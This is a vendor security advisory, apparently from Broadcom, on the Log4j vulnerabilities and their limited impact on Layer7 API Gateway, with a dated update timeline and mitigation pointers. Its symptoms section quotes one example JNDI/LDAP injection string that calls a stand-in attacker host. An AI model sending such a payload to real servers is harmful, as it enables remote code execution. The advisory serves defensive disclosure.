Support Content Notification - Support Portal

Layer7 API Gateway - Security Advisory - Log4J CVE-2021-44228, CVE-2021-45046, CVE-2021-4104

Product/Component

CA API Gateway

1 more products

Notification Id

19791

Last Updated

21 December 2021

Initial Publication Date

10 December 2021

Status

CLOSED

Severity

Critical

CVSS Base Score

10.0

WorkAround

Affected CVE

Dear Broadcom Customer:

The purpose of this Advisory is to inform you of a critical vulnerability that has been recently identified with the log4j library under vulnerabilities, CVE-2021-44228, CVE-2021-45046, and CVE-2021-4104. Please read the information provided below and follow the instructions in order to avoid being impacted by this problem.

PRODUCT(S) AFFECTED: Layer7 API Gateway

RELEASE: 9.4, 10.0, 10.1

PROBLEM DESCRIPTION:

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.

SYMPTOMS:

A single string of text can trigger an application to reach out to an external location if it is logged via the vulnerable instance of log4j. A threat actor might supply special text in an HTTP User-Agent header or a simple POST form request, with the usual form: /$/{jndi:ldap://maliciousexternalhost.com/resource, where maliciousexternalhost.com is an instance controlled by the adversary.

IMPACT:

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

WORKAROUND:

No workaround is required at this time.

PROBLEM RESOLUTION:

Dec 10, 2021 - Investigation has started.

Dec 14, 2021 - We have not discovered any issues in Layer7 API Gateway software itself so far, but Symantec SiteMinder (CA Single Sign-on) has been impacted. As Gateway includes SSO SDK by default, API gateway is impacted. Please follow this KB article for mitigation steps.

On a similar note, we would like to remind customers that if they have added any third party components on Gateway instances which were not shipped by Broadcom, please check for advisories from respective vendors.

If you have any questions about this Advisory, please contact Broadcom Support.

Dec 16, 2021 - This is the final update. We have not seen any further impact to Layer7 API Gateway. Please follow the KB article to mitigate risk identified earlier.

Dec 21, 2021 - This update clarifies the full list of CVEs covered. No further impacts have been seen.

ADDITIONAL INFORMATION:

According to the latest updates from the log4j team, a related vulnerability for log4j 1.x, limited to JMSAppender only, is published as a separate CVE.

As API Gateway does not utilize the JMS appender of log4j and does not include the "JndiLookup.class"., API Gateway is not impacted. Customers should check the log4j configuration(s) if they have added JMSAppender and should remove them to avoid this vulnerability. We will plan for a library upgrade in the near future.

Thank you,

Broadcom Support Team.